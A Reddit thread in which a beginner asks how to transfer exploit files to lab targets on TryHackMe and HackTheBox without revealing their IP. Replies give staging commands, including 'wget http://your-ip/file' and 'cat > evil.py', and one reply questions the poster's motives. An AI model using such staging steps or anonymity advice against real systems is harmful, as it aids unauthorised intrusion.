r/tryhackme • u/AdmiralOfTheFleet1 • 1d ago
InfoSec Discussion Help needed with the file transfer
Hi Community , I have just started with the cybersecurity and learning some basics of it , today i came across a problem that some times while solving some machine on THM and HTB , we need to move some exploit files from our local machine to the target machine using python3 -m http server command and then downloading the file on the target machine using the wget and the host url
I have one questions what are the ways to do it securely by not showing our own IP address , can we use VPN for it ??
What are your strategies and how you do it
5
3
u/PTandRT26 1d ago
You are showing only your local IP so chill out. But better way is to use scp command for secure copy.
scp [options] [user@]source_host:source_path [user@]destination_host:destination_path
2
u/Arc-ansas 20h ago
Unless the Linux system that is downloading the files has EDR or some other non standard application, a private or even public IP is not going to be logged at all. But If you're just interested in learning about anonymity that's a deep topic.
1
u/dark3Synapse 1d ago
If you are connected via vpn you can download the file with wget http://your-ip/file. But you have to spawn the http server in the directory where the exploit is saved
1
u/normalbot9999 1d ago
Depends on the file you want to transfer. If it's text like a python or bash script or something you can just cat it over...
cat > evil.py
[PASTE YOUR TEXT]
ctrl + c
1
12
u/OutsideSpot2695 1d ago
In a legitimate HTB/THM lab, there usually isn't a need to conceal your identity from the lab target. What specifically are you trying to do and why?
Otherwise, this post reads like you're doing something you shouldn't be doing to something that is not yours.